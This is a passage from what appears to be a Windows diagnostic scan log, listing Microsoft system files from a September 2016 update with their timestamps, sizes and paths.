09:19 - 00903680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe 2016-09-29 15:14 - 2016-09-15 09:19 - 00788992 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe 2016-09-29 15:14 - 2016-09-15 09:19 - 00717824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2016-09-29 15:14 - 2016-09-15 09:16 - 01817088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll 2016-09-29 15:14 - 2016-09-15 09:16 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2016-09-29 15:14 - 2016-09-15 09:16 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SessEnv.dll 2016-09-29 15:13 - 2016-09-15 10:37 - 00402352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ws2_32.dll 2016-09-29 15:13 - 2016-09-15 10:35 - 01570680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll 2016-09-29 15:13 - 2016-09-15 10:32 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2016-09-29 15:13 - 2016-09-15 10:30 - 00646136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll 2016-09-29 15:13 - 2016-09-15 10:29 - 00218008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe 2016-09-29 15:13 - 2016-09-15 10:29 - 00081760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys 2016-09-29 15:13 - 2016-09-15 10:29 - 00023392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cmimcext.sys 2016-09-29 15:13 - 2016-09-15 10:28 - 00498960 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll 2016-09-29 15:13 - 2016-09-15 10:26 - 00090400 _____ (Microsoft Corporation) C:\WINDOWS\system32\devenum.dll 2016-09-29 15:13 - 2016-09-15 10:25 - 00262960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll 2016-09-29 15:13 - 2016-09-15 10:24 - 00764936 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 2016-09-29 15:13 - 2016-09-15 10:23 - 01503032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll 2016-09-29 15:13 - 2016-09-15 10:22 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2016-09-29 15:13 - 2016-09-15 10:22 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll 2016-09-29 15:13 - 2016-09-15 10:19 - 00361104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tsmf.dll 2016-09-29 15:13 - 2016-09-15 10:18 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll 2016-09-29 15:13 - 2016-09-15 10:18 - 01123368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll 2016-09-29 15:13 - 2016-09-15 10:18 - 00955528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2016-09-29 15:13 - 2016-09-15 10:18 - 00856872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfreadwrite.dll 2016-09-29 15:13 - 2016-09-15 10:18 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll 2016-09-29 15:13 - 2016-09-15 10:17 - 04311736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe 2016-09-29 15:13 - 2016-09-15 10:16 - 07219672 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2016-09-29 15:13 - 2016-09-15 10:16 - 02190176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2016-09-29 15:13 - 2016-09-15 10:16 - 01738040 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll 2016-09-29 15:13 - 2016-09-15 10:16 - 01157000 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll 2016-09-29 15:13 - 2016-09-15 10:16 - 00657760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2016-09-29 15:13 - 2016-09-15 10:16 - 00401760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 2016-09-29 15:13 - 2016-09-15 10:16 - 00206096 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll 2016-09-29 15:13 - 2016-09-15 10:15 - 00649568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys 2016-09-29 15:13 - 2016-09-15 10:15 - 00341936 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll 2016-09-29 15:13 - 2016-09-15 10:15 - 00223584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys 2016-09-29 15:13 - 2016-09-15 10:15 - 00130912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys 2016-09-29 15:13 - 2016-09-15 10:14 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2016-09-29 15:13 - 2016-09-15 10:14 - 00988512 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2016-09-29 15:13 - 2016-09-15 10:12 - 08158672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2016-09-29 15:13 - 2016-09-15 10:11 - 04673296 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2016-09-29 15:13 - 2016-09-15 10:06 - 01046880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys 2016-09-29 15:13 - 2016-09-15 10:00 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll 2016-09-29 15:13 - 2016-09-15 10:00 - 00518656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ngccredprov.dll 2016-09-29 15:13 - 2016-09-15 10:00 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll 2016-09-29 15:13 - 2016-09-15 09:58 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Background.SystemEventsBroker.dll 2016-09-29 15:13 - 2016-09-15 09:58 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.UserDeviceAssociation.dll 2016-09-29 15:13 - 2016-09-15 09:57 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll 2016-09-29 15:13 - 2016-09-15 09:57 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll 2016-09-29 15:13 - 2016-09-15 09:56 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll 2016-09-29 15:13 - 2016-09-15 09:56 - 00257536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DataExchange.dll 2016-09-29 15:13 - 2016-09-15 09:55 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll 2016-09-29 15:13 - 2016-09-15 09:55 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll 2016-09-29 15:13 - 2016-09-15 09:55 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetworkCollectionAgent.dll 2016-09-29 15:13 - 2016-09-15 09:55 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll 2016-09-29 15:13 - 2016-09-15 09:55 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll 2016-09-29 15:13 - 2016-09-15 09:55 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\biwinrt.dll 2016-09-29 15:13 - 2016-09-15 09:54 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll 2016-09-29 15:13 - 2016-09-15 09:53 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2016-09-29 15:13 - 2016-09-15 09:53 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll 2016-09-29 15:13 - 2016-09-15 09:52 - 01358336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll 2016-09-29 15:13 - 2016-09-15 09:52 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NaturalLanguage6.dll 2016-09-29 15:13 - 2016-09-15 09:52 - 00525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintDialogs.dll 2016-09-29 15:13 - 2016-09-15 09:52 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptngc.dll 2016-09-29 15:13 - 2016-09-15 09:49 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll 2016-09-29 15:13 - 2016-09-15 09:49 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll 2016-09-29 15:13 - 2016-09-15 09:48 - 01321472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll 2016-09-29 15:13 - 2016-09-15 09:48 - 01112576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll 2016-09-29 15:13 - 2016-09-15 09:47 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll 2016-09-29 15:13 - 2016-09-15 09:47 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Energy.dll 2016-09-29 15:13 - 2016-09-15 09:46 - 03305984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll 2016-09-29 15:13 - 2016-09-15 09:45 - 02642944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll 2016-09-29 15:13 - 2016-09-15 09:45 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll 2016-09-29 15:13 - 2016-09-15 09:44 - 00209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAC3ENC.DLL 2016-09-29 15:13 - 2016-09-15 09:43 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll 2016-09-29 15:13 - 2016-09-15 09:42 - 01220608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll 2016-09-29 15:13 - 2016-09-15 09:42 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_sr.dll 2016-09-29 15:13 - 2016-09-15 09:42 - 00492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe 2016-09-29 15:13 - 2016-09-15 09:42 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winhvr.sys 2016-09-29 15:13 - 2016-09-15 09:41 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.SyncEngine.dll 2016-09-29 15:13 - 2016-09-15 09:41 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll 2016-09-29 15:13 - 2016-09-15 09:41 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Client.dll 2016-09-29 15:13 - 2016-09-15 09:41 - 00108032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Authentication.dll 2016-09-29 15:13 - 2016-09-15 09:40 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2016-09-29 15:13 - 2016-09-15 09:40 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll 2016-09-29 15:13 - 2016-09-15 09:40 - 00249856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthLEEnum.sys 2016-09-29 15:13 - 2016-09-15 09:40 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll 2016-09-29 15:13 - 2016-09-15 09:40 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthRadioMedia.dll 2016-09-29 15:13 - 2016-09-15 09:40 - 00082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.UserDeviceAssociation.dll 2016-09-29 15:13 - 2016-09-15 09:39 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll 2016-09-29 15:13 - 2016-09-15 09:39 - 00408576 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll 2016-09-29 15:13 - 2016-09-15 09:39 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll 2016-09-29 15:13 - 2016-09-15 09:39 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll 2016-09-29 15:13 - 2016-09-15 09:39 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00671232 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkCollectionAgent.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00573952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnrGidsHandler.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFiDirect.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.Phone.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SerialCommunication.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll 2016-09-29 15:13 - 2016-09-15 09:37 - 00690176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll 2016-09-29 15:13 - 2016-09-15 09:37 - 00568320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.LowLevel.dll 2016-09-29 15:13 - 2016-09-15 09:37 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll 2016-09-29 15:13 - 2016-09-15 09:36 - 00686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsregcmd.exe 2016-09-29 15:13 - 2016-09-15 09:36 - 00648192 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll 2016-09-29 15:13 - 2016-09-15 09:36 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll 2016-09-29 15:13 - 2016-09-15 09:36 - 00407552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll 2016-09-29 15:13 - 2016-09-15 09:36 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll 2016-09-29 15:13 - 2016-09-15 09:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll 2016-09-29 15:13 - 2016-09-15 09:36 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupugc.exe 2016-09-29 15:13 - 2016-09-15 09:35 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataExchange.dll 2016-09-29 15:13 - 2016-09-15 09:35 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\easwrt.dll 2016-09-29 15:13 - 2016-09-15 09:34 - 00441856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll 2016-09-29 15:13 - 2016-09-15 09:34 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll 2016-09-29 15:13 - 2016-09-15 09:34 - 00284160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll 2016-09-29 15:13 - 2016-09-15 09:33 - 03753984 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootux.dll 2016-09-29 15:13 - 2016-09-15 09:33 - 01004032 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll 2016-09-29 15:13 - 2016-09-15 09:33 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll 2016-09-29 15:13 - 2016-09-15 09:33 - 00512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprapi.dll 2016-09-29 15:13 - 2016-09-15 09:32 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll 2016-09-29 15:13 - 2016-09-15 09:32 - 00634368 _____ (Microsoft Corporation) C:\WINDOWS\system32\StructuredQuery.dll 2016-09-29 15:13 - 2016-09-15 09:31 - 01053184 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll 2016-09-29 15:13 - 2016-09-15 09:31 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe 2016-09-29 15:13 - 2016-09-15 09:30 - 01639424 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll 2016-09-29 15:13 - 2016-09-15 09:29 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll 2016-09-29 15:13 - 2016-09-15 09:29 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RelPost.exe 2016-09-29 15:13 - 2016-09-15 09:28 - 03288064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll 2016-09-29 15:13 - 2016-09-15 09:28 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll 2016-09-29 15:13 - 2016-09-15 09:28 - 00718848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer.dll 2016-09-29 15:13 - 2016-09-15 09:27 - 02860032 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll 2016-09-29 15:13 - 2016-09-15 09:27 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2016-09-29 15:13 - 2016-09-15 09:27 - 00702976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.MediaPlayer.dll 2016-09-29 15:13 - 2016-09-15 09:26 - 00501248 _____ (Microsoft Corporation) C:\WINDOWS\system32\imapi2.dll 2016-09-29 15:13 - 2016-09-15 09:25 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll 2016-09-29 15:13 - 2016-09-15 09:25 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\BackgroundMediaPolicy.dll 2016-09-29 15:13 - 2016-09-15 09:23 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll 2016-09-29 15:13 - 2016-09-15 09:23 - 01361408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll 2016-09-29 15:13 - 2016-09-15 09:23 - 01020928 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll 2016-09-29 15:13 - 2016-09-15 09:23 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll 2016-09-29 15:13 - 2016-09-15 09:23 - 00347648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll 2016-09-29 15:13 - 2016-09-15 09:22 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll 2016-09-29 15:13 - 2016-09-15 09:22 - 01709056 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll 2016-09-29 15:13 - 2016-09-15 09:22 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll 2016-09-29 15:13 - 2016-09-15 09:22 - 00770560 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll 2016-09-29 15:13 - 2016-09-15 09:22 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll 2016-09-29 15:13 - 2016-09-15 09:21 - 00971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll 2016-09-29 15:13 - 2016-09-15 09:20 - 02424320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll 2016-09-29 15:13 - 2016-09-15 09:20 - 02095616 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2016-09-29 15:13 - 2016-09-15 09:20 - 01710080 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll 2016-09-29 15:13 - 2016-09-15 09:20 - 01275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll 2016-09-29 15:13 - 2016-09-15 09:19 - 03202048 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll 2016-09-29 15:13 - 2016-09-15 09:19 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2016-09-29 15:13 - 2016-09-15 09:18 - 01369088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll 2016-09-29 15:13 - 2016-09-15 09:18 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll 2016-09-29 15:13 - 2016-09-15 09:17 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll 2016-09-29 15:13 - 2016-09-15 09:16 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\spaceman.exe 2016-09-29 15:13 - 2016-08-05 20:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll 2016-09-29 15:13 - 2016-08-05 01:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.UXRes.dll 2016-09-29 15:12 - 2016-09-15 10:37 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll 2016-09-29 15:12 - 2016-09-15 10:37 - 00496872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll 2016-09-29 15:12 - 2016-09-15 10:29 - 00424640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ws2_32.dll 2016-09-29 15:12 - 2016-09-15 10:29 - 00169056 _____ (Microsoft Corporation) C:\WINDOWS\system32\skci.dll 2016-09-29 15:12 - 2016-09-15 10:29 - 00074080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vpci.sys 2016-09-29 15:12 - 2016-09-15 10:27 - 01883784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll 2016-09-29 15:12 - 2016-09-15 10:27 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys 2016-09-29 15:12 - 2016-09-15 10:25 - 00340320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2016-09-29 15:12 - 2016-09-15 10:25 - 00280472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeunlock.exe 2016-09-29 15:12 - 2016-09-15 10:22 - 00433832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll 2016-09-29 15:12 - 2016-09-15 10:21 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll 2016-09-29 15:12 - 2016-09-15 10:18 - 06654616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2016-09-29 15:12 - 2016-09-15 10:15 - 00557408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys 2016-09-29 15:12 - 2016-09-15 10:15 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys 2016-09-29 15:12 - 2016-09-15 10:14 - 01415752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll 2016-09-29 15:12 - 2016-09-15 10:14 - 00947552 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi 2016-09-29 15:12 - 2016-09-15 10:14 - 00811872 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe 2016-09-29 15:12 - 2016-09-15 10:14 - 00435040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys 2016-09-29 15:12 - 2016-09-15 10:12 - 01472536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll 2016-09-29 15:12 - 2016-09-15 10:11 - 01990640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll 2016-09-29 15:12 - 2016-09-15 10:11 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll 2016-09-29 15:12 - 2016-09-15 10:11 - 01066104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll 2016-09-29 15:12 - 2016-09-15 10:11 - 00862064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfreadwrite.dll 2016-09-29 15:12 - 2016-09-15 10:11 - 00725664 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll 2016-09-29 15:12 - 2016-09-15 10:11 - 00160096 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll 2016-09-29 15:12 - 2016-09-15 10:08 - 05683712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2016-09-29 15:12 - 2016-09-15 10:07 - 01572768 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll 2016-09-29 15:12 - 2016-09-15 10:07 - 01418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll 2016-09-29 15:12 - 2016-09-15 10:07 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmapi.dll 2016-09-29 15:12 - 2016-09-15 10:06 - 00372440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll 2016-09-29 15:12 - 2016-09-15 10:01 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Radios.dll 2016-09-29 15:12 - 2016-09-15 09:59 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\unimdm.tsp 2016-09-29 15:12 - 2016-09-15 09:59 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll 2016-09-29 15:12 - 2016-09-15 09:58 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll 2016-09-29 15:12 - 2016-09-15 09:58 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll 2016-09-29 15:12 - 2016-09-15 09:58 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll 2016-09-29 15:12 - 2016-09-15 09:58 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll 2016-09-29 15:12 - 2016-09-15 09:57 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll 2016-09-29 15:12 - 2016-09-15 09:57 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll 2016-09-29 15:12 - 2016-09-15 09:57 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll 2016-09-29 15:12 - 2016-09-15 09:56 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll 2016-09-29 15:12 - 2016-09-15 09:56 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll 2016-09-29 15:12 - 2016-09-15 09:56 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll 2016-09-29 15:12 - 2016-09-15 09:56 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Core.dll 2016-09-29 15:12 - 2016-09-15 09:55 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll 2016-09-29 15:12 - 2016-09-15 09:55 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll 2016-09-29 15:12 - 2016-09-15 09:55 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll 2016-09-29 15:12 - 2016-09-15 09:55 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll 2016-09-29 15:12 - 2016-09-15 09:55 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupugc.exe 2016-09-29 15:12 - 2016-09-15 09:54 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll 2016-09-29 15:12 - 2016-09-15 09:54 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll 2016-09-29 15:12 - 2016-09-15 09:53 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll 2016-09-29 15:12 - 2016-09-15 